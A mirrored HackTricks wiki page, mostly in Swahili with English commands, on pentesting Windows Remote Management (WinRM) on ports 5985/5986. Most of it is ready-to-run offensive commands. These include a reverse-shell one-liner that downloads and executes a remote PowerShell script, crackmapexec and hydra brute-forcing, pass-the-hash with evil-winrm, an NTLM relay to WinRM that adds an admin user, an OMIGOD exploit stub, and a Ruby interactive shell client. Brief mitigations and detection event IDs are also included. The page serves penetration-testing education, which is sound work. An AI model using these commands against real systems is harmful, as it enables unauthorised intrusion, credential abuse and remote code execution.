maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/5985-5986-pentesting-winrm.md

331 lines
14 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 5985,5986 - Pentesting WinRM
{{#include ../banners/hacktricks-training.md}}
## WinRM
[Windows Remote Management (WinRM)](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx>) inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inategemea WMI, ikijitambulisha kama kiolesura cha HTTP kwa shughuli za WMI.
Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama ilivyo kwa SSH kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum:
- **5985/tcp (HTTP)**
- **5986/tcp (HTTPS)**
Bandari iliyo wazi kutoka kwenye orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali.
### **Kuanza Kikao cha WinRM**
Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika:
```bash
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
Njia hii inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji.
Zaidi ya hayo, WinRM inaweza **kuzinduliwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa:
```bash
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
Hii mbinu inaruhusu kuweka WinRM kwa mbali, ikiongeza ufanisi katika kusimamia mashine za Windows kutoka mbali.
### Jaribu ikiwa imewekwa
Ili kuthibitisha usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` inatumika kuangalia ikiwa lengo lina WinRM imewekwa ipasavyo. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la protokali na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini kuna mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililo na usanidi dhidi ya lile lisilo na usanidi:
- Kwa lengo ambalo **lime**wekwa ipasavyo, matokeo yataonekana kama ifuatavyo:
```bash
Test-WSMan <target-ip>
```
Majibu yanapaswa kuwa na taarifa kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri.
![](<../images/image (582).png>)
- Kinyume chake, kwa lengo **sio** lililowekwa kwa WinRM, matokeo yatakuwa hakuna taarifa kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM.
![](<../images/image (458).png>)
### Teua amri
Ili kutekeleza `ipconfig` kwa mbali kwenye mashine ya lengo na kuona matokeo yake fanya:
```bash
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
![](<../images/image (151).png>)
Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako ya ndani na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya:
```bash
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
### Teua Skripti
```bash
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### Pata reverse-shell
```bash
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### Pata kikao cha PS
Ili kupata shell ya PowerShell ya mwingiliano tumia `Enter-PSSession`:
```bash
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
```
![](<../images/image (1009).png>)
**Kikao kitaendesha katika mchakato mpya (wsmprovhost) ndani ya "mhasiriwa"**
### **Kulazimisha WinRM Kufunguliwa**
Ili kutumia PS Remoting na WinRM lakini kompyuta haijawekwa, unaweza kuifanya iweze kwa:
```bash
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
### Saving and Restoring sessions
Hii **haitaweza kufanya kazi** ikiwa **lugha** ime **punguzia** kwenye kompyuta ya mbali.
```bash
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
Ndani ya kikao hiki unaweza kupakia skripti za PS ukitumia _Invoke-Command_
```bash
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
### Makosa
Ikiwa unapata makosa yafuatayo:
`enter-pssession : Kuungana na seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa makosa ufuatao : Mteja wa WinRM haiwezi kushughulikia ombi. Ikiwa mpango wa uthibitishaji ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijajiunga na eneo, basi usafiri wa HTTPS lazima utumike au mashine ya marudio lazima iongezwe kwenye mipangilio ya TrustedHosts. Tumia winrm.cmd kuunda mipangilio ya TrustedHosts. Kumbuka kwamba kompyuta katika orodha ya TrustedHosts zinaweza zisithibitishwe. Unaweza kupata maelezo zaidi kuhusu hilo kwa kuendesha amri ifuatayo: winrm help config. Kwa maelezo zaidi, angalia mada ya msaada ya about_Remote_Troubleshooting.`
Jaribu kwenye mteja (habari kutoka [hapa](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
## WinRM connection in linux
### Brute Force
Kuwa makini, brute-forcing winrm inaweza kuzuia watumiaji.
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
### Kutumia evil-winrm
```ruby
gem install evil-winrm
```
Soma **dokumentasiyo** kwenye github yake: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```
Ili kutumia evil-winrm kuungana na **anwani ya IPv6**, tengeneza kipengee ndani ya _**/etc/hosts**_ ukipatia **jina la kikoa** anwani ya IPv6 na uungane na kikoa hicho.
### Pita hash na evil-winrm
```ruby
evil-winrm -u <username> -H <Hash> -i <IP>
```
![](<../images/image (680).png>)
### Kutumia mashine ya PS-docker
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### Kutumia script ya ruby
**Msimbo umetolewa kutoka hapa:** [**https://alamot.github.io/winrm_shell/**](https://alamot.github.io/winrm_shell/)
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)
class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
```
## Shodan
- `port:5985 Microsoft-HTTPAPI`
---
## Recent Vulnerabilities & Offensive Techniques (2021-2025)
### NTLM relay directly to WinRM (WS-MAN)
Tangu Impacket 0.11 (Mei 2023) `ntlmrelayx.py` inaweza kupeleka akreditif za NTLM zilizokamatwa moja kwa moja kwa **WS-MAN**/WinRM listener. Wakati mwenyeji bado anasikiliza kwenye **HTTP isiyo na usalama (5985)** mshambuliaji anaweza kuunganisha *mitm6* (au *Responder*) ili kulazimisha uthibitisho na kupata utekelezaji wa msimbo wa kiwango cha SYSTEM:
```bash
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
--command "net user pwned P@ssw0rd! /add"
```
Mitigations
* Zima wasikilizaji wa HTTP `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false`
* Lazimisha HTTPS na kuwezesha Ulinzi wa Kupanuliwa kwa Uthibitishaji (EPA) kwenye toleo jipya la Windows.
### OMIGOD CVE-2021-38647 (Azure OMI)
Azure Linux agents hutumia huduma ya **Open Management Infrastructure (OMI)** ambayo inafichua API ya WinRM/WS-MAN kwenye porti **5985/5986**. Kosa la mantiki liliruhusu **RCE isiyo na uthibitisho kama root**:
```text
curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '<xml …/>'
```
Patch auondoe OMI (toleo ≥ 1.6.8-1) na kuzuia bandari hizo kutoka kwa Mtandao.
### WSMan.Automation COM matumizi mabaya kwa ajili ya harakati za upande
WinRM inaweza kuendeshwa bila PowerShell kupitia `WSMan.Automation` COM object muhimu kwenye mifumo katika hali ya Lugha Iliyopangwa. Zana kama *SharpWSManWinRM* zinafunga mbinu hii:
```powershell
$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)
```
Mnyororo wa utekelezaji (`svchost → wmiprvse → cmd.exe`) ni sawa na PS-Remoting ya jadi.
---
## Sasisho za Zana
* **Evil-WinRM v3.x (2024)** sasa inasaidia **Kerberos** (`-k` / `--spn`) na uthibitishaji wa **cheti** (`--cert-pem`/`--key-pem`), usajili wa kikao (`-L`) na uwezo wa kuzima ukamilishaji wa njia ya mbali (`-N`).
```bash
RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST
```
* **Python `pypsrp` 0.9 (2024)** inatoa WinRM & PS-Remoting kutoka Linux, ikiwa ni pamoja na CredSSP na Kerberos:
```python
from psrp.client import Client
c = Client('srv01', username='ACME\\j.doe', ssl=True)
print(c.execute_cmd('ipconfig /all').std_out.decode())
```
* **Ugunduzi** fuatilia kumbukumbu ya **Microsoft-Windows-WinRM/Operational**:
* Tukio 91 / 163 shell imeundwa
* Tukio 182 kushindwa kwa uthibitishaji
* Katika kumbukumbu ya Usalama tukio 4262 linaandika IP ya chanzo (imeongezwa Julai 2022 CUs).
Kusanya hizi kwa kati na kutoa tahadhari kuhusu IP zisizo na jina au za nje.
---
## Shodan
- `port:5985 Microsoft-HTTPAPI`
## Marejeleo
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/)
- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure)
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## HackTricks Amri za Otomatiki
```
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p MySuperSecr3tPass123!
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html
Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink